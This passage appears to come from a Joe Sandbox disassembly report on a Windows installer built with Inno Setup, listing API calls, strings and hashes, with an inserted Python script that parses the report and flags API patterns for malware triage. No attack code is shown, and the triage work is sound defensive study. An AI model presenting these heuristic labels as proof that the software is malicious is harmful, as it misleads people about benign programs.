TlsSetValue TlsGetValue TlsGetValue 57259->57277 57261 44817c 57263 442ba6 57262->57263 57264 441c01 57262->57264 57265 403400 4 API calls 57263->57265 57266 403400 4 API calls 57264->57266 57267 442bbb 57265->57267 57268 441c09 57266->57268 57267->57253 57269 431464 4 API calls 57268->57269 57271 441c15 57269->57271 57270 442b96 57270->57253 57271->57270 57278 4412a0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 57271->57278 57273->57249 57274->57256 57275->57257 57276->57259 57277->57261 57278->57271 57279 22e1010 57281 22e1019 57279->57281 57280 22e101d 57281->57280 57283 45bbf8 5 API calls 57281->57283 57282 22e106a 57283->57282
Strings
• Time stamp of existing file: %s, xrefs: 0046C453
• Installing the file., xrefs: 0046C931
• Time stamp of our file: %s, xrefs: 0046C3C3
• Time stamp of our file: (failed to read), xrefs: 0046C3CF
• Uninstaller requires administrator: %s, xrefs: 0046CB9D
• , xrefs: 0046C5F7, 0046C7C8, 0046C846
• Incrementing shared file count (32-bit)., xrefs: 0046CFB0
• Couldn't read time stamp. Skipping., xrefs: 0046C75D
• InUn, xrefs: 0046CB6D
• Skipping due to "onlyifdoesntexist" flag., xrefs: 0046C3F6
• Existing file's MD5 sum is different from our file. Proceeding., xrefs: 0046C6EC
• Time stamp of existing file: (failed to read), xrefs: 0046C45F
• Stripped read-only attribute., xrefs: 0046C8EF
• Failed to read existing file's MD5 sum. Proceeding., xrefs: 0046C6F8
• Existing file has a later time stamp. Skipping., xrefs: 0046C7F7
• Will register the file (a DLL/OCX) later., xrefs: 0046CF2A
• Dest filename: %s, xrefs: 0046C2BC
• Same time stamp. Skipping., xrefs: 0046C77D
• User opted not to overwrite the existing file. Skipping., xrefs: 0046C875
• Version of existing file: %u.%u.%u.%u, xrefs: 0046C5A4
• User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0046C8BE
• Version of our file: (none), xrefs: 0046C524
• Failed to strip read-only attribute., xrefs: 0046C8FB
• -- File entry --, xrefs: 0046C123
• Same version. Skipping., xrefs: 0046C70D
• Will register the file (a type library) later., xrefs: 0046CF1E
• Version of existing file: (none), xrefs: 0046C722
• Version of our file: %u.%u.%u.%u, xrefs: 0046C518
• Dest file is protected by Windows File Protection., xrefs: 0046C315
• UF, xrefs: 0046D11F
• Existing file's MD5 sum matches our file. Skipping., xrefs: 0046C6DD
• Dest file exists., xrefs: 0046C3E3
• Skipping due to "onlyifdestfileexists" flag., xrefs: 0046C922
• Incrementing shared file count (64-bit)., xrefs: 0046CF97
• @, xrefs: 0046C1D8
• Non-default bitness: 32-bit, xrefs: 0046C2E3
• Non-default bitness: 64-bit, xrefs: 0046C2D7
• .tmp, xrefs: 0046C9DF
• Existing file is protected by Windows File Protection. Skipping., xrefs: 0046C814
• Existing file is a newer version. Skipping., xrefs: 0046C62A
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID:
• String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's MD5 sum is different from our file. Proceeding.$Existing file's MD5 sum matches our file. Skipping.$Failed to read existing file's MD5 sum. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$UF$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
• API String ID: 0-843965562
• Opcode ID: 3aa41980a51285452c5a719ab75ef6ba90a455b0b06de281e8ec642f8d67b5cd
• Instruction ID: 2c976b8502b68867d0ce509d0e418c852ac65d8e3c14b9799468bf735a09a243
• Opcode Fuzzy Hash: 3aa41980a51285452c5a719ab75ef6ba90a455b0b06de281e8ec642f8d67b5cd
• Instruction Fuzzy Hash: A5926430E042489FCB11DFA5C495BEDBBB5AF09304F5440ABE844AB392E7789E45CF5A
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7873e9bd340cf6d7e9cfa7a0788c35c3dc5b9db54546344555b68b7d46e3100b
                                                                            • Instruction ID: 7115e30b2d35316c82e91109ae6d6d6b504554527cf119b6ec0a5d38efd5eaef
                                                                            • Opcode Fuzzy Hash: 7873e9bd340cf6d7e9cfa7a0788c35c3dc5b9db54546344555b68b7d46e3100b
                                                                            • Instruction Fuzzy Hash: 88E19A30B00124EBC710DF69E585A5EB7B0FF48704FA441AAE645AB352CB7DEE81DB09
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph (edge list of the rendered graph, node ids 1924-2540, not reproduced): basic blocks 4637d4-464ede; Windows API calls on the graph: LoadBitmapA, GetSystemMenu, AppendMenuA (called twice)
                                                                            APIs
                                                                              • Part of subcall function 0048F804: GetWindowRect.USER32(00000000), ref: 0048F81A
                                                                            • LoadBitmapA.USER32(00400000,STOPIMAGE), ref: 00463BA3
                                                                              • Part of subcall function 0041D620: GetObjectA.GDI32(?,00000018,00463BBD), ref: 0041D64B
                                                                              • Part of subcall function 00463630: SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 004636CD
                                                                              • Part of subcall function 00463630: ExtractIconA.SHELL32(00400000,00000000,?), ref: 004636F3
                                                                              • Part of subcall function 00463630: SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 0046374F
                                                                              • Part of subcall function 00463630: ExtractIconA.SHELL32(00400000,00000000,?), ref: 00463775
                                                                              • Part of subcall function 00462FEC: KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00463C58,00000000,00000000,00000000,0000000C,00000000), ref: 00463004
                                                                              • Part of subcall function 0048FA60: MulDiv.KERNEL32(0000000D,?,0000000D), ref: 0048FA6A
                                                                              • Part of subcall function 0048F754: 73A0A570.USER32(00000000,?,?,?), ref: 0048F776
                                                                              • Part of subcall function 0048F754: SelectObject.GDI32(?,00000000), ref: 0048F79C
                                                                              • Part of subcall function 0048F754: 73A0A480.USER32(00000000,?,0048F7FA,0048F7F3,?,00000000,?,?,?), ref: 0048F7ED
                                                                              • Part of subcall function 0048FA50: MulDiv.KERNEL32(0000004B,?,00000006), ref: 0048FA5A
                                                                            • GetSystemMenu.USER32(00000000,00000000,0000000C,00000000,00000000,00000000,00000000,02200500,02202154,?,?,02202184,?,?,022021D4,?), ref: 0046481B
                                                                            • AppendMenuA.USER32(00000000,00000800,00000000,00000000), ref: 0046482C
                                                                            • AppendMenuA.USER32(00000000,00000000,0000270F,00000000), ref: 00464844
                                                                              • Part of subcall function 00429FCC: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 00429FE2
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$AppendExtractFileIconInfoObject$A480A570BitmapCallbackDispatcherLoadMessageRectSelectSendSystemUserWindow
                                                                            • String ID: $(Default)$STOPIMAGE
                                                                            • API String ID: 1965080796-770201673
                                                                            • Opcode ID: 852b161cdb0dace639722325e252d42721c2c4ef680a80770af8d8d997e53459
                                                                            • Instruction ID: a97045497617a37e73d7fe25ec91c7d2f949ac95d49f9cf5c1555c71fec600f2
                                                                            • Opcode Fuzzy Hash: 852b161cdb0dace639722325e252d42721c2c4ef680a80770af8d8d997e53459
                                                                            • Instruction Fuzzy Hash: C9F2D5386005119FCB00EB69D8D9F9973F5BF89304F1542B6E5049B36AD778EC4ACB8A
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • FindFirstFileA.KERNEL32(00000000,?,?,00000000,?,00000000,0047A648,?,00000000,00000000,?,?,0047B77D,?,?,00000000), ref: 0047A4AC
                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,?,?,00000000,?,00000000,0047A648,?,00000000,00000000,?,?,0047B77D,?), ref: 0047A4F5
                                                                            • FindClose.KERNEL32(000000FF,000000FF,?,00000000,?,?,00000000,?,00000000,0047A648,?,00000000,00000000,?,?,0047B77D), ref: 0047A502
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,00000000,?,00000000,0047A648,?,00000000,00000000,?,?,0047B77D,?), ref: 0047A54E
                                                                            • FindNextFileA.KERNEL32(000000FF,?,00000000,0047A61B,?,00000000,?,00000000,?,?,00000000,?,00000000,0047A648,?,00000000), ref: 0047A5F7
                                                                            • FindClose.KERNEL32(000000FF,0047A622,0047A61B,?,00000000,?,00000000,?,?,00000000,?,00000000,0047A648,?,00000000,00000000), ref: 0047A615
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstNext
                                                                            • String ID:
                                                                            • API String ID: 3541575487-0
                                                                            • Opcode ID: 58c32b23aa8a6e90c09b165a63e98b8d05e69813d422197aa64ba14eba77b4ae
                                                                            • Instruction ID: df6970a490733c3fc08b9eb15c5b52ce16d10e4af30c9d3b25a464b00084d34d
                                                                            • Opcode Fuzzy Hash: 58c32b23aa8a6e90c09b165a63e98b8d05e69813d422197aa64ba14eba77b4ae
                                                                            • Instruction Fuzzy Hash: FE516F71900648AFCB11EF65CC45ADEB7BCEB88319F1084BAA408E7341D6389F55CF59
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,004708E6,?,?,00000001,004950AC), ref: 004707D5
                                                                            • FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004708E6,?,?,00000001,004950AC), ref: 004708B2
                                                                            • FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004708E6,?,?,00000001,004950AC), ref: 004708C0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Find$File$CloseFirstNext
                                                                            • String ID: unins$unins???.*
                                                                            • API String ID: 3541575487-1009660736
                                                                            • Opcode ID: 73466def34ad962c4187833bf759d0dd7cecfad84590a124285bf170d0f599fa
                                                                            • Instruction ID: 3fcbdb993abfa6ff85d44bbf729c32bfcaea701f4f0f62c70188b68341c8b9af
                                                                            • Opcode Fuzzy Hash: 73466def34ad962c4187833bf759d0dd7cecfad84590a124285bf170d0f599fa
                                                                            • Instruction Fuzzy Hash: 57315370A00108DBDB10EB65C885ADEB7A8DF45304F55C0B6E448AB7A2D738DF419B99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00447F9D), ref: 00447EE0
                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 00447F61
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID:
                                                                            • API String ID: 2574300362-0
                                                                            • Opcode ID: e1f9654b16739f7afd9434fe722f8049f548f167a04ca6919c39ec6c1a6f3416
                                                                            • Instruction ID: 0540f09e741ba6bdaccbcd33a6618944dfbf5ea3d39d596ba1fc0c584366e1b5
                                                                            • Opcode Fuzzy Hash: e1f9654b16739f7afd9434fe722f8049f548f167a04ca6919c39ec6c1a6f3416
                                                                            • Instruction Fuzzy Hash: 87514574E04105AFDB00EF95C481AAEB7F9EF44315F1081BBE814BB391DB389E058B99
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%
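
                                                                            The "APIs" lists in these entries share one line format: `Api.MODULE(slot,slot,...), ref: ADDR`, optionally prefixed with `Part of subcall function ADDR:` for calls reached indirectly. The Python below is an added example (not Joe Sandbox code and not code from the analysed sample) that parses that format and flags two patterns visible on this page: the FindFirstFileA/FindNextFileA/FindClose enumeration loop of the entry at 004707D5 and the LoadLibraryExA followed by GetProcAddress pair of the entry at 00447EE0, decoding LoadLibraryExA's dwFlags column (0x8 is LOAD_WITH_ALTERED_SEARCH_PATH). The sample lines are copied from the entries above; the SendMessageA subcall line is borrowed from the GUI routine's entry only to show that indirect calls are parsed but not counted. Caveat for anyone reusing this: the columns are the stack slots the sandbox observed at the call site, so values beyond a function's real parameter count are not arguments, `?` means unresolved, and the flag decode is only meaningful when the first three columns line up with the LoadLibraryEx prototype. Pattern names and the helper functions are this example's own, not report fields.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed test input: "APIs" lines copied from two entries on this page.
# Group 1 is the directory-enumeration routine whose first call site is 004707D5.
SAMPLE_FIND_LOOP = """\
• FindFirstFileA.KERNEL32(00000000,?,00000000,004708E6,?,?,00000001,004950AC), ref: 004707D5
• FindNextFileA.KERNEL32(00000000,?,00000000,?,00000000,004708E6,?,?,00000001,004950AC), ref: 004708B2
• FindClose.KERNEL32(00000000,00000000,?,00000000,?,00000000,004708E6,?,?,00000001,004950AC), ref: 004708C0
"""
# Group 2 is the LoadLibraryExA/GetProcAddress routine at 00447EE0, plus one
# "Part of subcall function" line (taken from another entry) to exercise that prefix.
SAMPLE_DYNAMIC_IMPORT = """\
  • Part of subcall function 00429FCC: SendMessageA.USER32(00000000,0000014E,00000000,00000000), ref: 00429FE2
• LoadLibraryExA.KERNEL32(00000000,00000000,00000008,?,?,00000000,00447F9D), ref: 00447EE0
• GetProcAddress.KERNEL32(00000000,00000000), ref: 00447F61
"""

# One report line: optional subcall prefix, Api.MODULE(args), ref: call-site address.
# String arguments that themselves contain ')' or ',' would need a real tokenizer.
API_LINE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]          # raw stack-slot strings as printed; "?" = unresolved
    ref: int                 # call-site address (the "ref:" value)
    subcall: Optional[int]   # address of the callee when the call is indirect, else None


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse a block of Joe Sandbox 'APIs' lines into ApiCall records."""
    calls = []
    for line in text.splitlines():
        if not line.strip():
            continue
        m = API_LINE.match(line)
        if not m:
            raise ValueError(f"unrecognised APIs line: {line!r}")
        raw_args = m.group("args")
        args = [a.strip() for a in raw_args.split(",")] if raw_args else []
        calls.append(ApiCall(
            api=m.group("api"),
            module=m.group("mod"),
            args=args,
            ref=int(m.group("ref"), 16),
            subcall=int(m.group("sub"), 16) if m.group("sub") else None,
        ))
    return calls


# dwFlags bits of LoadLibraryEx (documented Win32 constants).
LOADLIBRARY_FLAGS = {
    0x00000001: "DONT_RESOLVE_DLL_REFERENCES",
    0x00000002: "LOAD_LIBRARY_AS_DATAFILE",
    0x00000008: "LOAD_WITH_ALTERED_SEARCH_PATH",
    0x00000010: "LOAD_IGNORE_CODE_AUTHZ_LEVEL",
    0x00000020: "LOAD_LIBRARY_AS_IMAGE_RESOURCE",
    0x00000040: "LOAD_LIBRARY_AS_DATAFILE_EXCLUSIVE",
    0x00000100: "LOAD_LIBRARY_SEARCH_DLL_LOAD_DIR",
    0x00000200: "LOAD_LIBRARY_SEARCH_APPLICATION_DIR",
    0x00000400: "LOAD_LIBRARY_SEARCH_USER_DIRS",
    0x00000800: "LOAD_LIBRARY_SEARCH_SYSTEM32",
    0x00001000: "LOAD_LIBRARY_SEARCH_DEFAULT_DIRS",
}


def decode_loadlibrary_flags(call: ApiCall) -> Optional[List[str]]:
    """Decode slot 2 (dwFlags) of a LoadLibraryExA/W line; None if not applicable or unresolved."""
    if call.api not in ("LoadLibraryExA", "LoadLibraryExW") or len(call.args) < 3:
        return None
    raw = call.args[2]
    if raw == "?":
        return None
    flags = int(raw, 16) & 0xFFFFFFFF
    return [name for bit, name in sorted(LOADLIBRARY_FLAGS.items()) if flags & bit]


def triage(calls: List[ApiCall]) -> List[str]:
    """Label API combinations worth a second look; only direct calls of the entry count."""
    direct = {c.api for c in calls if c.subcall is None}
    findings = []
    if {"FindFirstFileA", "FindNextFileA"} <= direct or {"FindFirstFileW", "FindNextFileW"} <= direct:
        findings.append("directory-enumeration-loop")
    loaders = {"LoadLibraryA", "LoadLibraryW", "LoadLibraryExA", "LoadLibraryExW"}
    if direct & loaders and "GetProcAddress" in direct:
        findings.append("dynamic-api-resolution")
    return findings


if __name__ == "__main__":
    for label, text in (("find loop", SAMPLE_FIND_LOOP), ("dynamic import", SAMPLE_DYNAMIC_IMPORT)):
        calls = parse_api_lines(text)
        print(label, triage(calls))
        for c in calls:
            flags = decode_loadlibrary_flags(c)
            if flags is not None:
                print(f"  {c.api} at {c.ref:08X}: dwFlags = {flags}")
```

                                                                            Run stand-alone it prints the labels for both groups and the decoded dwFlags of the LoadLibraryExA call; the same parser can be pointed at any other entry's "APIs" block on this page, with the caveat about column alignment above.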

                                                                            APIs
                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,00451447,?,?,-00000001,00000000), ref: 00451421
                                                                            • GetLastError.KERNEL32(00000000,?,00000000,00451447,?,?,-00000001,00000000), ref: 00451429
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorFileFindFirstLast
                                                                            • String ID:
                                                                            • API String ID: 873889042-0
                                                                            • Opcode ID: 9098511829d4e670addc214c55e43265b4f5de8ad82b820fa4573d5b106649ad
                                                                            • Instruction ID: e37cade2724d1815d1fa35268cc527e6c5f68d3fdc0659cff19e79a06527a77b
                                                                            • Opcode Fuzzy Hash: 9098511829d4e670addc214c55e43265b4f5de8ad82b820fa4573d5b106649ad
                                                                            • Instruction Fuzzy Hash: AFF04931A00204AB8B10EFA69C4149EF7ECDB4672676086BBFC14E3692DA784D048558
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            APIs
                                                                            • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,004944C0,00000001,?,0040859B,?,00000000,0040867A), ref: 004084EE
                                                                            Memory Dump Source
                                                                            • Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
                                                                            • Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                            Similarity
                                                                            • API ID: InfoLocale
                                                                            • String ID:
                                                                            • API String ID: 2299586839-0
                                                                            • Opcode ID: db4c94cdf382ee3399fd393310c0d3b07f3e4771964ce669c16d021a31866df8
                                                                            • Instruction ID: 1ce02aaae6ec4ade8b295bae84213e8e13784b7c216e354617812bc232f4da8b
                                                                            • Opcode Fuzzy Hash: db4c94cdf382ee3399fd393310c0d3b07f3e4771964ce669c16d021a31866df8
                                                                            • Instruction Fuzzy Hash: 59E0D87170021467D711E95A9C869F7B35CA758314F00427FB949EB3C2EDB8DE4046ED
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

APIs
• NtdllDefWindowProc_A.USER32(?,?,?,?,?,004240C1,?,00000000,004240CC), ref: 00423B1E
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
• Opcode ID: cc880d6ce53abf1e7d27737915fc5f31ec95f8b5a45794faa8616ac4cf8ccc5f
• Instruction ID: 62037174fb3a4e63d39f4d80a9d1e591ad15120c94b51c82d4663250cb3dbf53
• Opcode Fuzzy Hash: cc880d6ce53abf1e7d27737915fc5f31ec95f8b5a45794faa8616ac4cf8ccc5f
• Instruction Fuzzy Hash: A0F0C579205608AFCB40DF9DC588D4AFBE8FB4C260B158295B988CB321C234FE808F94
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: NameUser
• String ID:
• API String ID: 2645101109-0
• Opcode ID: cdb4bec123f1825443ad5cc623391d8cf1be7f4fb66e8da3f94aff517a088b8d
• Instruction ID: 0cfc6298fdd12068752ce7e5f45c2d53baaa1050ce66cc5593b8e4691a5d7c37
• Opcode Fuzzy Hash: cdb4bec123f1825443ad5cc623391d8cf1be7f4fb66e8da3f94aff517a088b8d
• Instruction Fuzzy Hash: 69D0C2B120420053C300AE68DC8269635AC8B84356F10483E7C85CB3C3EA7CDF4D566A
Uniqueness
Uniqueness Score: -1.00%

APIs
• NtdllDefWindowProc_A.USER32(?,?,?,?), ref: 0042ED70
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: NtdllProc_Window
• String ID:
• API String ID: 4255912815-0
• Opcode ID: 0d99781ba3b74d129cf7fe284f2fb874a2833baad2c3ee0b8c17a51b42a1def1
• Instruction ID: 792271a71424278b40c344544890263380edecd1d6d7572d4222c7646c861560
• Opcode Fuzzy Hash: 0d99781ba3b74d129cf7fe284f2fb874a2833baad2c3ee0b8c17a51b42a1def1
• Instruction Fuzzy Hash: 0FD05E7121010DAB8B00DE99E880C6B33AC9B88740B608805F518C7205C634EC1087A5
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (entry block at 46aa8c; graph rendering not reproduced in text)
APIs
  • Part of subcall function 0046A878: RegSetValueExA.ADVAPI32(?,Inno Setup: Setup Version,00000000,00000001,00000000,00000001,?,?,004950AC,?,0046AB7B,?,00000000,0046B003,?,_is1), ref: 0046A89B
• RegCloseKey.ADVAPI32(?,0046B00A,?,_is1,?,Software\Microsoft\Windows\CurrentVersion\Uninstall\,00000000,0046B055,?,?,00000001,004950AC), ref: 0046AFFD
Strings
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215523042.0000000000493000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.3215554032.00000000004A4000.00000002.00000001.01000000.00000004.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_file.jbxd
Similarity
• API ID: CloseValue
• String ID: " /SILENT$5.3.4 (a)$Comments$Contact$DisplayIcon$DisplayName$DisplayVersion$HelpLink$HelpTelephone$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: Setup Version$Inno Setup: User$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$InstallDate$InstallLocation$MajorVersion$MinorVersion$ModifyPath$NoModify$NoRepair$Publisher$QuietUninstallString$Readme$RegisterPreviousData$Software\Microsoft\Windows\CurrentVersion\Uninstall\$URLInfoAbout$URLUpdateInfo$UninstallString$_is1
• API String ID: 3132538880-4027905794
• Opcode ID: 9a8eb871790f0b22bcff3233a218b1705323e430392313ecfac733ee4545f969
• Instruction ID: bcc948474739f7d4ff28eebc8c8e5d3f87406a7e72996d7d4e0226daa9b19a94
• Opcode Fuzzy Hash: 9a8eb871790f0b22bcff3233a218b1705323e430392313ecfac733ee4545f969
• Instruction Fuzzy Hash: 70F15870A005099BCB04EB55D8519AEB7B9EB44304F60C07BE811AB395EB78BD46CF5A
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (entry block at 48c62c; graph rendering not reproduced in text)
APIs
• Sleep.KERNEL32(00000000,00000000,0048CB21,?,?,?,?,00000000,00000000,00000000), ref: 0048C66C
• FindWindowA.USER32(00000000,00000000), ref: 0048C69D
Strings
Memory Dump Source
• Source File: 00000001.00000002.3215414704.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.3215381170.0000000000400000.00000002.00000001.01000000.00000004.sdmp
